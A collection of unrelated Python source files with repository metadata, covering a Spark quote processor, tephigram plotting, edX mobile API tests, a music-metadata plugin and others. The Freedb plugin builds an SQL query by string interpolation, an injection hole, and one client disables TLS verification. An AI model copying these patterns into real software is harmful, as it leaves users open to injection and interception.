askList[exchangeList.index(list1[i][7])] = sys.maxsize
askSize[exchangeList.index(list1[i][7])] = 0
for j in range(len(exchangeList)):
if (bbExCnt[j] > 0):
bbExSize[j] = bbExSize[j]/bbExCnt[j]
if (baExCnt[j] > 0):
baExSize[j] = baExSize[j]/baExCnt[j]
nbboList.append((record[0],(bbExCnt, bbExSize, baExCnt, baExSize)))
return nbboList
if __name__ == "__main__":
conf = SparkConf().setAppName("nbbo_hfalert")
sc = SparkContext(conf=conf)
data1 = sc.textFile(inputDir)
data2 = data1.zipWithIndex()
data3 = data2.map(lambda rec: (rec[0][10:26].strip(),
(rec[1], #index
rec[0][0:9], #ms time
float(rec[0][26:37])/10000, #bid price
int(rec[0][37:44]), #bid size
float(rec[0][44:55])/10000, #ask price
int(rec[0][55:62]), #ask size
rec[0][67], #bid exchange
rec[0][68], #ask exchange
rec[0][87]))).groupByKey() #cancel or correction
result = data3.flatMap(lambda records: processquote(records)).map(lambda rec: [rec[0], rec[1][0], rec[1][1], rec[1][2], rec[1][3]])
result.saveAsTextFile(outputDir)
|
rdhyee/dlab-finance
|
crossings/nbboex.py
|
Python
|
isc
| 5,138 | 0.011872 |
# Now make a simple example using the custom projection.
import pdb
import sys
import os
import pkg_resources
pkg_resources.require('matplotlib==1.4.0')
import datetime
from dateutil.relativedelta import relativedelta
import re
import math
from matplotlib.ticker import ScalarFormatter, MultipleLocator
from matplotlib.collections import LineCollection
import matplotlib.pyplot as plt
from StringIO import StringIO
import numpy as np
from numpy import load
# Exception handling, with line number and stuff
import linecache
import sys
def PrintException():
exc_type, exc_obj, tb = sys.exc_info()
f = tb.tb_frame
lineno = tb.tb_lineno
filename = f.f_code.co_filename
linecache.checkcache(filename)
line = linecache.getline(filename, lineno, f.f_globals)
print 'EXCEPTION IN ({}, LINE {} "{}"): {}'.format(filename, lineno, line.strip(), exc_obj)
import imp
imp.load_source('SoundingRoutines', '/nfs/see-fs-01_users/eepdw/python_scripts/Tephigram/Sounding_Routines.py')
imp.load_source('TephigramPlot', '/nfs/see-fs-01_users/eepdw/python_scripts/Tephigram/Tephigram_Functions.py')
from TephigramPlot import *
from SoundingRoutines import *
imp.load_source('GeogFuncs', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/GeogFunctions.py')
from GeogFuncs import *
pmin=200.
station_list_cs=[42182, 43003, 43014, 42867, 43371, 43353, 43285, 43192, 43150, 42339, 40990, 40948]
#station_list_cs=[43003]
date_min=datetime.datetime(1960,5,1,0,0,0)
date_max=datetime.datetime(2014,10,1,0,0,0)
delta = relativedelta(weeks=+1)
variable_list={'pressures': 0, 'temps':1, 'dewpoints':2, 'winddirs':3, 'windspeeds':4, 'pot_temp':5,
'sat_vap_pres':6, 'vap_press':7, 'rel_hum':8, 'wvmr':9, 'sp_hum':10, 'sat_temp':11,
'theta_e':12, 'theta_e_sat':13, 'theta_e_minus_theta_e_sat':14}
variable_list_line={'lcl_temp': 0, 'lcl_vpt':1, 'pbl_pressure':2, 'surface_pressure':3, 'T_eq_0':4}
def variable_name_index_match(variable, variable_list):
for key, value in variable_list.iteritems(): # iter on both keys and values
if key.startswith('%s' % variable) and key.endswith('%s' % variable):
arr_index_var=value
return arr_index_var
# Parse the data
for stat in station_list_cs:
station_name,la,lo, st_height=StationInfoSearch(stat)
load_file = load('/nfs/a90/eepdw/Data/Observations/Radiosonde_Numpy/Radiosonde_Cross_Section_'
'IND_SOUNDING_INTERP_MEAN_Climat_%s_%s_%s_%s.npz'
% (date_min.strftime('%Y%m%d'), date_max.strftime('%Y%m%d'), delta, stat))
data=load_file['date_bin_mean_all_dates_one_station']
dates=load_file['dates_for_plotting']
for bin in range(data.shape[0]):
try:
p=data[bin,0,:]/100
T=data[bin,1,:]-273.15
Td=T-data[bin,2,:]
h=data[bin,15,:]
da=dates[bin]
#print T
#print p
#print Td
#pdb.set_trace()
#u_wind,v_wind = u_v_winds(data[bin,3,:], data[bin,4,:])
u_wind,v_wind = data[bin,-2,:], data[bin,-1,:]
# Create a new figure. The dimensions here give a good aspect ratio
fig = plt.figure(figsize=(10, 8), frameon=False)
#fig.patch.set_visible(False)
tephigram_plot_height=0.85
tephigram_plot_bottom=.085
ax = fig.add_axes([.085,tephigram_plot_bottom,.65,tephigram_plot_height], projection='skewx', frameon=False, axisbg='w')
ax.set_yscale('log')
plt.grid(True)
#pdb.set_trace()
tmax=math.ceil(nanmax(T)/10)*10
tmin=math.floor(nanmin(Td[p>400])/10)*10
pmax=math.ceil(nanmax(p)/50)*50
P=linspace(pmax,pmin,37)
w = array([0.0001,0.0004,0.001, 0.002, 0.004, 0.007, 0.01, 0.016, 0.024, 0.032, 0.064, 0.128])
ax.add_mixratio_isopleths(w,linspace(pmax, 700., 37),color='m',ls='-',alpha=.5,lw=0.5)
ax.add_dry_adiabats(linspace(-40,40,9),P,color='k',ls='-',alpha=.5,lw=0.8)
ax.add_moist_adiabats(linspace(-40,40,18),P,color='k',ls='--',alpha=.5,lw=0.8, do_labels=False)
ax.other_housekeeping(pmax, pmin, 40,-40)
wbax = fig.add_axes([0.75,tephigram_plot_bottom,0.12,tephigram_plot_height],frameon=False, sharey=ax, label='barbs')
ax_text_box = fig.add_axes([0.85,0.085,.12,tephigram_plot_height], frameon=False, axisbg='w')
# Plot the data using normal plotting functions, in this case using semilogy
ax.semilogy(T, p, 'r', linewidth=2)
ax.semilogy(Td, p, 'r',linewidth=2)
# row_labels=(
# 'SLAT',
# 'SLON',
# 'SELV',
# 'SHOW',
# 'LIFT',
# 'LFTV',
# 'SWET',
# 'KINX',
# 'CTOT',
# 'VTOT',
# 'TOTL',
# 'CAPE',
# 'CINS',
# 'CAPV',
# 'CINV',
# 'LFCT',
# 'LFCV',
# 'BRCH',
# 'BRCV',
# 'LCLT',
# 'LCLP',
# 'MLTH',
# 'MLMR',
# 'THCK',
# 'PWAT')
# variable='pbl_pressure'
# var_index = variable_name_index_match(variable, variable_list_line)
# print load_file['date_bin_mean_all_dates_one_station_single'].shape
# pbl_pressure = load_file['date_bin_mean_all_dates_one_station_single'][bin,0,var_index]
# print pbl_pressure
# EQLV, pp, lclp,lfcp, lclt, delta_z, CAPE, CIN=CapeCinPBLInput(p, T, Td, h, st_height, pbl_pressure/100)
# print lclp
# table_vals=(
# #'%s' % station_name,
# #'Climatology - Week beg. %s' % da,
# '%s' % la,
# '%s' % lo,
# '%s' % st_height,
# '%.1f' % ShowalterIndex(T, Td, p), # ['Showalter index',
# '%.1f' % LiftedIndex(T, Td, p, h, st_height), # 'Lifted index',
# '--', # 'LIFT computed using virtual temperature',
# '--', # 'SWEAT index',
# '%.1f' % KIndex(T, Td, p), # 'K index',
# '%.1f' % CrossTotalsIndex(T, Td, p), # 'Cross totals index',
# '%.1f' % VerticalTotalsIndex(T, p), # 'Vertical totals index',
# '%.1f' % TotalTotalsIndex(T, Td, p), # 'Total totals index',
# '%.1f' % CAPE, # 'CAPE',
# '%.1f' % CIN, # 'CIN',
# '--', # 'CAPE using virtual temperature',
# '--', # 'CINS using virtual temperature',
# '%.1f' % lfcp, # 'Level of free convection',
# '--', # 'LFCT using virtual temperature',
# '--' , # 'Bulk Richardson number',
# '--', # 'Bulk richardson using CAPV',
# '%.1f' % lclt, # 'Temp [K] of the Lifted Condensation Level',
# '%.1f' % lclp , # 'Pres [hPa] of the Lifted Condensation Level',
# '--', # 'Mean mixed layer potential temperature',
# '--', # 'Mean mixed layer mixing ratio',
# '--', # '1000 hPa to 500 hPa thickness',
# '--') # 'Precipitable water [mm] for entire sounding']
# Wind barbs
barbs_idx=np.logspace(np.log10(10),np.log10(max(len(u_wind))),num=32).astype(int)
wbax.set_yscale('log')
wbax.xaxis.set_ticks([],[])
wbax.yaxis.grid(True,ls='-',color='y',lw=0.5)
wbax.set_xlim(-1.5,1.5)
wbax.get_yaxis().set_visible(False)
wbax.set_ylim(pmax+100,pmin)
wbax.barbs((zeros(p.shape))[barbs_idx-1],p[barbs_idx-1], u_wind[barbs_idx-1], v_wind[barbs_idx-1])
# Disables the log-formatting that comes with semilogy
ax.yaxis.set_major_formatter(ScalarFormatter())
ax.set_yticks(linspace(100,1000,10))
ax.set_ylim(pmax,pmin)
ax.set_xlim(-40.,40.)
ax.xaxis.set_ticks([],[])
ax_text_box.xaxis.set_visible(False)
ax_text_box.yaxis.set_visible(False)
for tick in wbax.yaxis.get_major_ticks():
# tick.label1On = False
pass
#wbax.get_yaxis().set_tick_params(size=0,color='y')
# y_loc=1.
# max_string_length = max([len(line) for line in row_labels])
# for t,r in zip(row_labels,table_vals):
# label_rightjust=('{:>%i}' % max_string_length).format(t)
# ax_text_box.text(0.5, y_loc, ' %s:' % (label_rightjust), size=8, horizontalalignment='right')
# ax_text_box.text(0.5, y_loc, ' %s' % (r), size=8, horizontalalignment='left')
# y_loc-=0.04
fig.text(.02,0.965, '%s %s' %(stat, station_name), size=12, horizontalalignment='left')
fig.text(.02,0.035, 'Climatology - Week beg. %s ' %(da.strftime('%m-%d')), size=12, horizontalalignment='left')
#plt.show()
plt.savefig('/nfs/a90/eepdw/Figures/Radiosonde/Tephigrams/Weekly_Climatology/Weekly_Climatology_%s_%s_%s_Skew_T.png' % (station_name.replace('/','_').replace(' ', '_'), stat, da.strftime('%Y%m%d')))
plt.close()
except Exception:
print PrintException()
|
peterwilletts24/Python-Scripts
|
Tephigram/Tephigrams_From_Radiosonde_Climatology_Onset.py
|
Python
|
mit
| 11,003 | 0.020813 |
from __future__ import absolute_import
from changes.api.base import APIView
from changes.models import Task
class TaskIndexAPIView(APIView):
def get(self):
queryset = Task.query.order_by(Task.date_created.desc())
return self.paginate(queryset)
|
bowlofstew/changes
|
changes/api/task_index.py
|
Python
|
apache-2.0
| 268 | 0 |
#!/usr/bin/env python
# vi:ai:et:ts=4 sw=4
#
# -*- coding: utf8 -*-
#
# PyMmr My Music Renamer
# Copyright (C) 2007-2010 mathgl67@gmail.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
from mmr.plugin import AbstractResearchPlugin
from mmr.album import Album
from mmr.abstract_investigate import AbstractInvestigate
class Freedb(AbstractResearchPlugin):
def setup(self):
self.investigate_class = FreedbInvestigate
self.about = {
"name": u"Freedb",
"short_description": u"",
"long_description": u"",
}
self.priority = 5
def available(self):
try:
import MySQLdb
except ImportError as exception:
return False
return True
plugin_class=Freedb
class FreedbInvestigate(AbstractInvestigate):
def _set_up_(self):
import MySQLdb
self.db = MySQLdb.connect(
host=self._config_['host'],
user=self._config_['user'],
passwd=self._config_['password'],
db=self._config_['db']
)
self.db.set_character_set("utf8")
self._album_ = Album('freedb', self._base_score_)
def do_album(self):
for res in self._album_list_:
if res.artist and res.album:
artist = res.artist.encode("UTF-8")
album = res.album.encode("UTF-8")
self.db.query("""
SELECT genre, year FROM album WHERE artist LIKE "%s" AND title LIKE "%s"
""" % ( artist, album ))
r = self.db.store_result()
for (genre, year) in r.fetch_row(0):
self._album_.artist = res.artist
self._album_.album = res.album
self._album_.genre = unicode(genre, "UTF-8")
self._album_.year = unicode(str(year), "UTF-8")
return self._album_
def do_track(self, file_obj, result_array):
return None
|
mathgl67/pymmr
|
mmr/plugins/research/freedb.py
|
Python
|
gpl-2.0
| 2,675 | 0.003364 |
# -*- coding: utf-8 -*-
# Copyright(C) 2010-2011 Nicolas Duhamel
#
# This file is part of a weboob module.
#
# This weboob module is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This weboob module is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this weboob module. If not, see <http://www.gnu.org/licenses/>.
from .login import (
LoginPage, Initident, CheckPassword, repositionnerCheminCourant,
BadLoginPage, AccountDesactivate, UnavailablePage,
Validated2FAPage, TwoFAPage, SmsPage, DecoupledPage,
)
from .accountlist import AccountList, AccountRIB, Advisor, RevolvingAttributesPage
from .accounthistory import AccountHistory, CardsList
from .transfer import TransferChooseAccounts, CompleteTransfer, TransferConfirm, TransferSummary, CreateRecipient, ValidateRecipient,\
ValidateCountry, ConfirmPage, RcptSummary
from .subscription import SubscriptionPage, DownloadPage, ProSubscriptionPage
__all__ = ['LoginPage', 'Initident', 'CheckPassword', 'repositionnerCheminCourant', "AccountList", 'AccountHistory', 'BadLoginPage',
'AccountDesactivate', 'TransferChooseAccounts', 'CompleteTransfer', 'TransferConfirm', 'TransferSummary', 'UnavailablePage',
'CardsList', 'AccountRIB', 'Advisor', 'CreateRecipient', 'ValidateRecipient', 'ValidateCountry', 'ConfirmPage', 'RcptSummary',
'SubscriptionPage', 'DownloadPage', 'ProSubscriptionPage', 'RevolvingAttributesPage', 'Validated2FAPage', 'TwoFAPage',
'SmsPage', 'DecoupledPage', ]
|
laurentb/weboob
|
modules/bp/pages/__init__.py
|
Python
|
lgpl-3.0
| 1,981 | 0.003029 |
"""
Tests for users API
"""
import datetime
import ddt
import pytz
from django.conf import settings
from django.template import defaultfilters
from django.test import RequestFactory, override_settings
from django.utils import timezone
from milestones.tests.utils import MilestonesTestCaseMixin
from mock import patch
from lms.djangoapps.certificates.api import generate_user_certificates
from lms.djangoapps.certificates.models import CertificateStatuses
from lms.djangoapps.certificates.tests.factories import GeneratedCertificateFactory
from course_modes.models import CourseMode
from courseware.access_response import MilestoneAccessError, StartDateError, VisibilityError
from lms.djangoapps.grades.tests.utils import mock_passing_grade
from mobile_api.testutils import (
MobileAPITestCase,
MobileAuthTestMixin,
MobileAuthUserTestMixin,
MobileCourseAccessTestMixin
)
from openedx.core.lib.courses import course_image_url
from openedx.core.lib.tests import attr
from student.models import CourseEnrollment
from util.milestones_helpers import set_prerequisite_courses
from util.testing import UrlResetMixin
from xmodule.course_module import DEFAULT_START_DATE
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
from .. import errors
from .serializers import CourseEnrollmentSerializer
@attr(shard=9)
class TestUserDetailApi(MobileAPITestCase, MobileAuthUserTestMixin):
"""
Tests for /api/mobile/v0.5/users/<user_name>...
"""
REVERSE_INFO = {'name': 'user-detail', 'params': ['username']}
def test_success(self):
self.login()
response = self.api_response()
self.assertEqual(response.data['username'], self.user.username)
self.assertEqual(response.data['email'], self.user.email)
@attr(shard=9)
class TestUserInfoApi(MobileAPITestCase, MobileAuthTestMixin):
"""
Tests for /api/mobile/v0.5/my_user_info
"""
def reverse_url(self, reverse_args=None, **kwargs):
return '/api/mobile/v0.5/my_user_info'
def test_success(self):
"""Verify the endpoint redirects to the user detail endpoint"""
self.login()
response = self.api_response(expected_response_code=302)
self.assertIn(self.username, response['location'])
@attr(shard=9)
@ddt.ddt
@override_settings(MKTG_URLS={'ROOT': 'dummy-root'})
class TestUserEnrollmentApi(UrlResetMixin, MobileAPITestCase, MobileAuthUserTestMixin,
MobileCourseAccessTestMixin, MilestonesTestCaseMixin):
"""
Tests for /api/mobile/v0.5/users/<user_name>/course_enrollments/
"""
REVERSE_INFO = {'name': 'courseenrollment-detail', 'params': ['username']}
ALLOW_ACCESS_TO_UNRELEASED_COURSE = True
ALLOW_ACCESS_TO_MILESTONE_COURSE = True
ALLOW_ACCESS_TO_NON_VISIBLE_COURSE = True
NEXT_WEEK = datetime.datetime.now(pytz.UTC) + datetime.timedelta(days=7)
LAST_WEEK = datetime.datetime.now(pytz.UTC) - datetime.timedelta(days=7)
ADVERTISED_START = "Spring 2016"
ENABLED_SIGNALS = ['course_published']
DATES = {
'next_week': NEXT_WEEK,
'last_week': LAST_WEEK,
'default_start_date': DEFAULT_START_DATE,
}
@patch.dict(settings.FEATURES, {"ENABLE_DISCUSSION_SERVICE": True})
def setUp(self):
super(TestUserEnrollmentApi, self).setUp()
def verify_success(self, response):
"""
Verifies user course enrollment response for success
"""
super(TestUserEnrollmentApi, self).verify_success(response)
courses = response.data
self.assertEqual(len(courses), 1)
found_course = courses[0]['course']
self.assertIn('courses/{}/about'.format(self.course.id), found_course['course_about'])
self.assertIn('course_info/{}/updates'.format(self.course.id), found_course['course_updates'])
self.assertIn('course_info/{}/handouts'.format(self.course.id), found_course['course_handouts'])
self.assertIn('video_outlines/courses/{}'.format(self.course.id), found_course['video_outline'])
self.assertEqual(found_course['id'], unicode(self.course.id))
self.assertEqual(courses[0]['mode'], CourseMode.DEFAULT_MODE_SLUG)
self.assertEqual(courses[0]['course']['subscription_id'], self.course.clean_id(padding_char='_'))
expected_course_image_url = course_image_url(self.course)
self.assertIsNotNone(expected_course_image_url)
self.assertIn(expected_course_image_url, found_course['course_image'])
self.assertIn(expected_course_image_url, found_course['media']['course_image']['uri'])
def verify_failure(self, response, error_type=None):
self.assertEqual(response.status_code, 200)
courses = response.data
self.assertEqual(len(courses), 0)
@patch.dict(settings.FEATURES, {'ENABLE_MKTG_SITE': True})
def test_sort_order(self):
self.login()
num_courses = 3
courses = []
for course_index in range(num_courses):
courses.append(CourseFactory.create(mobile_available=True))
self.enroll(courses[course_index].id)
# verify courses are returned in the order of enrollment, with most recently enrolled first.
response = self.api_response()
for course_index in range(num_courses):
self.assertEqual(
response.data[course_index]['course']['id'],
unicode(courses[num_courses - course_index - 1].id)
)
@patch.dict(settings.FEATURES, {
'ENABLE_PREREQUISITE_COURSES': True,
'DISABLE_START_DATES': False,
'ENABLE_MKTG_SITE': True,
})
def test_courseware_access(self):
self.login()
course_with_prereq = CourseFactory.create(start=self.LAST_WEEK, mobile_available=True)
prerequisite_course = CourseFactory.create()
set_prerequisite_courses(course_with_prereq.id, [unicode(prerequisite_course.id)])
# Create list of courses with various expected courseware_access responses and corresponding expected codes
courses = [
course_with_prereq,
CourseFactory.create(start=self.NEXT_WEEK, mobile_available=True),
CourseFactory.create(visible_to_staff_only=True, mobile_available=True),
CourseFactory.create(start=self.LAST_WEEK, mobile_available=True, visible_to_staff_only=False),
]
expected_error_codes = [
MilestoneAccessError().error_code, # 'unfulfilled_milestones'
StartDateError(self.NEXT_WEEK).error_code, # 'course_not_started'
VisibilityError().error_code, # 'not_visible_to_user'
None,
]
# Enroll in all the courses
for course in courses:
self.enroll(course.id)
# Verify courses have the correct response through error code. Last enrolled course is first course in response
response = self.api_response()
for course_index in range(len(courses)):
result = response.data[course_index]['course']['courseware_access']
self.assertEqual(result['error_code'], expected_error_codes[::-1][course_index])
if result['error_code'] is not None:
self.assertFalse(result['has_access'])
@ddt.data(
('next_week', ADVERTISED_START, ADVERTISED_START, "string"),
('next_week', None, defaultfilters.date(NEXT_WEEK, "DATE_FORMAT"), "timestamp"),
('next_week', '', defaultfilters.date(NEXT_WEEK, "DATE_FORMAT"), "timestamp"),
('default_start_date', ADVERTISED_START, ADVERTISED_START, "string"),
('default_start_date', '', None, "empty"),
('default_start_date', None, None, "empty"),
)
@ddt.unpack
@patch.dict(settings.FEATURES, {'DISABLE_START_DATES': False, 'ENABLE_MKTG_SITE': True})
def test_start_type_and_display(self, start, advertised_start, expected_display, expected_type):
"""
Tests that the correct start_type and start_display are returned in the
case the course has not started
"""
self.login()
course = CourseFactory.create(start=self.DATES[start], advertised_start=advertised_start, mobile_available=True)
self.enroll(course.id)
response = self.api_response()
self.assertEqual(response.data[0]['course']['start_type'], expected_type)
self.assertEqual(response.data[0]['course']['start_display'], expected_display)
@patch.dict(settings.FEATURES, {"ENABLE_DISCUSSION_SERVICE": True, 'ENABLE_MKTG_SITE': True})
def test_discussion_url(self):
self.login_and_enroll()
response = self.api_response()
response_discussion_url = response.data[0]['course']['discussion_url']
self.assertIn('/api/discussion/v1/courses/{}'.format(self.course.id), response_discussion_url)
def test_org_query(self):
self.login()
# Create list of courses with various organizations
courses = [
CourseFactory.create(org='edX', mobile_available=True),
CourseFactory.create(org='edX', mobile_available=True),
CourseFactory.create(org='edX', mobile_available=True, visible_to_staff_only=True),
CourseFactory.create(org='Proversity.org', mobile_available=True),
CourseFactory.create(org='MITx', mobile_available=True),
CourseFactory.create(org='HarvardX', mobile_available=True),
]
# Enroll in all the courses
for course in courses:
self.enroll(course.id)
response = self.api_response(data={'org': 'edX'})
# Test for 3 expected courses
self.assertEqual(len(response.data), 3)
# Verify only edX courses are returned
for entry in response.data:
self.assertEqual(entry['course']['org'], 'edX')
@attr(shard=9)
@override_settings(MKTG_URLS={'ROOT': 'dummy-root'})
class TestUserEnrollmentCertificates(UrlResetMixin, MobileAPITestCase, MilestonesTestCaseMixin):
"""
Tests for /api/mobile/v0.5/users/<user_name>/course_enrollments/
"""
REVERSE_INFO = {'name': 'courseenrollment-detail', 'params': ['username']}
ENABLED_SIGNALS = ['course_published']
def verify_pdf_certificate(self):
"""
Verifies the correct URL is returned in the response
for PDF certificates.
"""
self.login_and_enroll()
certificate_url = "http://test_certificate_url"
GeneratedCertificateFactory.create(
user=self.user,
course_id=self.course.id,
status=CertificateStatuses.downloadable,
mode='verified',
download_url=certificate_url,
)
response = self.api_response()
certificate_data = response.data[0]['certificate']
self.assertEquals(certificate_data['url'], certificate_url)
@patch.dict(settings.FEATURES, {'ENABLE_MKTG_SITE': True})
def test_no_certificate(self):
self.login_and_enroll()
response = self.api_response()
certificate_data = response.data[0]['certificate']
self.assertDictEqual(certificate_data, {})
@patch.dict(settings.FEATURES, {'CERTIFICATES_HTML_VIEW': False, 'ENABLE_MKTG_SITE': True})
def test_pdf_certificate_with_html_cert_disabled(self):
"""
Tests PDF certificates with CERTIFICATES_HTML_VIEW set to True.
"""
self.verify_pdf_certificate()
@patch.dict(settings.FEATURES, {'CERTIFICATES_HTML_VIEW': True, 'ENABLE_MKTG_SITE': True})
def test_pdf_certificate_with_html_cert_enabled(self):
"""
Tests PDF certificates with CERTIFICATES_HTML_VIEW set to True.
"""
self.verify_pdf_certificate()
@patch.dict(settings.FEATURES, {'CERTIFICATES_HTML_VIEW': True, 'ENABLE_MKTG_SITE': True})
def test_web_certificate(self):
CourseMode.objects.create(
course_id=self.course.id,
mode_display_name="Honor",
mode_slug=CourseMode.HONOR,
)
self.login_and_enroll()
self.course.cert_html_view_enabled = True
self.store.update_item(self.course, self.user.id)
with mock_passing_grade():
generate_user_certificates(self.user, self.course.id)
response = self.api_response()
certificate_data = response.data[0]['certificate']
self.assertRegexpMatches(
certificate_data['url'],
r'http.*/certificates/user/{user_id}/course/{course_id}'.format(
user_id=self.user.id,
course_id=self.course.id,
)
)
@attr(shard=9)
class CourseStatusAPITestCase(MobileAPITestCase):
"""
Base test class for /api/mobile/v0.5/users/<user_name>/course_status_info/{course_id}
"""
REVERSE_INFO = {'name': 'user-course-status', 'params': ['username', 'course_id']}
def setUp(self):
"""
Creates a basic course structure for our course
"""
super(CourseStatusAPITestCase, self).setUp()
self.section = ItemFactory.create(
parent=self.course,
category='chapter',
)
self.sub_section = ItemFactory.create(
parent=self.section,
category='sequential',
)
self.unit = ItemFactory.create(
parent=self.sub_section,
category='vertical',
)
self.other_sub_section = ItemFactory.create(
parent=self.section,
category='sequential',
)
self.other_unit = ItemFactory.create(
parent=self.other_sub_section,
category='vertical',
)
@attr(shard=9)
class TestCourseStatusGET(CourseStatusAPITestCase, MobileAuthUserTestMixin,
MobileCourseAccessTestMixin, MilestonesTestCaseMixin):
"""
Tests for GET of /api/mobile/v0.5/users/<user_name>/course_status_info/{course_id}
"""
def test_success(self):
self.login_and_enroll()
response = self.api_response()
self.assertEqual(
response.data["last_visited_module_id"],
unicode(self.sub_section.location)
)
self.assertEqual(
response.data["last_visited_module_path"],
[unicode(module.location) for module in [self.sub_section, self.section, self.course]]
)
@attr(shard=9)
class TestCourseStatusPATCH(CourseStatusAPITestCase, MobileAuthUserTestMixin,
MobileCourseAccessTestMixin, MilestonesTestCaseMixin):
"""
Tests for PATCH of /api/mobile/v0.5/users/<user_name>/course_status_info/{course_id}
"""
def url_method(self, url, **kwargs):
# override implementation to use PATCH method.
return self.client.patch(url, data=kwargs.get('data', None))
def test_success(self):
self.login_and_enroll()
response = self.api_response(data={"last_visited_module_id": unicode(self.other_unit.location)})
self.assertEqual(
response.data["last_visited_module_id"],
unicode(self.other_sub_section.location)
)
def test_invalid_module(self):
self.login_and_enroll()
response = self.api_response(data={"last_visited_module_id": "abc"}, expected_response_code=400)
self.assertEqual(
response.data,
errors.ERROR_INVALID_MODULE_ID
)
def test_nonexistent_module(self):
self.login_and_enroll()
non_existent_key = self.course.id.make_usage_key('video', 'non-existent')
response = self.api_response(data={"last_visited_module_id": non_existent_key}, expected_response_code=400)
self.assertEqual(
response.data,
errors.ERROR_INVALID_MODULE_ID
)
def test_no_timezone(self):
self.login_and_enroll()
past_date = datetime.datetime.now()
response = self.api_response(
data={
"last_visited_module_id": unicode(self.other_unit.location),
"modification_date": past_date.isoformat()
},
expected_response_code=400
)
self.assertEqual(
response.data,
errors.ERROR_INVALID_MODIFICATION_DATE
)
def _date_sync(self, date, initial_unit, update_unit, expected_subsection):
"""
Helper for test cases that use a modification to decide whether
to update the course status
"""
self.login_and_enroll()
# save something so we have an initial date
self.api_response(data={"last_visited_module_id": unicode(initial_unit.location)})
# now actually update it
response = self.api_response(
data={
"last_visited_module_id": unicode(update_unit.location),
"modification_date": date.isoformat()
}
)
self.assertEqual(
response.data["last_visited_module_id"],
unicode(expected_subsection.location)
)
def test_old_date(self):
self.login_and_enroll()
date = timezone.now() + datetime.timedelta(days=-100)
self._date_sync(date, self.unit, self.other_unit, self.sub_section)
def test_new_date(self):
self.login_and_enroll()
date = timezone.now() + datetime.timedelta(days=100)
self._date_sync(date, self.unit, self.other_unit, self.other_sub_section)
def test_no_initial_date(self):
self.login_and_enroll()
response = self.api_response(
data={
"last_visited_module_id": unicode(self.other_unit.location),
"modification_date": timezone.now().isoformat()
}
)
self.assertEqual(
response.data["last_visited_module_id"],
unicode(self.other_sub_section.location)
)
def test_invalid_date(self):
self.login_and_enroll()
response = self.api_response(data={"modification_date": "abc"}, expected_response_code=400)
self.assertEqual(
response.data,
errors.ERROR_INVALID_MODIFICATION_DATE
)
@attr(shard=9)
@patch.dict(settings.FEATURES, {'ENABLE_MKTG_SITE': True})
@override_settings(MKTG_URLS={'ROOT': 'dummy-root'})
class TestCourseEnrollmentSerializer(MobileAPITestCase, MilestonesTestCaseMixin):
"""
Test the course enrollment serializer
"""
ENABLED_SIGNALS = ['course_published']
def setUp(self):
super(TestCourseEnrollmentSerializer, self).setUp()
self.login_and_enroll()
self.request = RequestFactory().get('/')
self.request.user = self.user
def test_success(self):
serialized = CourseEnrollmentSerializer(
CourseEnrollment.enrollments_for_user(self.user)[0],
context={'request': self.request},
).data
self.assertEqual(serialized['course']['name'], self.course.display_name)
self.assertEqual(serialized['course']['number'], self.course.id.course)
self.assertEqual(serialized['course']['org'], self.course.id.org)
# Assert utm parameters
expected_utm_parameters = {
'twitter': 'utm_campaign=social-sharing-db&utm_medium=social&utm_source=twitter',
'facebook': 'utm_campaign=social-sharing-db&utm_medium=social&utm_source=facebook'
}
self.assertEqual(serialized['course']['course_sharing_utm_parameters'], expected_utm_parameters)
def test_with_display_overrides(self):
self.course.display_coursenumber = "overridden_number"
self.course.display_organization = "overridden_org"
self.store.update_item(self.course, self.user.id)
serialized = CourseEnrollmentSerializer(
CourseEnrollment.enrollments_for_user(self.user)[0],
context={'request': self.request},
).data
self.assertEqual(serialized['course']['number'], self.course.display_coursenumber)
self.assertEqual(serialized['course']['org'], self.course.display_organization)
|
teltek/edx-platform
|
lms/djangoapps/mobile_api/users/tests.py
|
Python
|
agpl-3.0
| 20,030 | 0.002646 |
# Copyright 2018 Politecnico di Torino
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import requests
from cybertop.log import LOG
def retrieve_vnsfr_id(vnsfo_base_url, vnfd_id, attack_name, timeout):
LOG.info("Request vNSFO API call for vnsfd_id=" + vnfd_id +
" and attack type=" + attack_name)
url = vnsfo_base_url + "/vnsf/r4/running"
LOG.info("VNSFO API call: " + url)
try:
response = requests.get(url, verify=False, timeout=timeout)
LOG.info("VNSFO API response: " + response.text)
vnsfs = response.json()["vnsf"]
# search for first running instance which matches the query
for vnsf in vnsfs:
target_vnf = vnsf['vnfd_id'][:-5].lower()
if vnfd_id[:-5].lower() in target_vnf and attack_name.lower() in target_vnf:
LOG.info("Found instance=" + vnsf['vnfr_id'] +
" for attack=" + attack_name)
return vnsf['vnfr_id']
LOG.info("No running instance found from VNSFO API.")
return None
except Exception as e:
LOG.critical("VNSFO API error: " + str(e))
return None
|
shield-h2020/dare-sec-topo
|
cybertop/vnsfo.py
|
Python
|
apache-2.0
| 1,650 | 0.000606 |
import pandas as pd
from sklearn import linear_model
import matplotlib.pyplot as plt
df = pd.read_fwf('brain_body.txt')
x_values = df[['Brain']]
y_values = df[['Body']]
#train model on data
body_reg = linear_model.LinearRegression()
body_reg.fit(x_values, y_values)
# visualise results
plt.scatter(x_values, y_values)
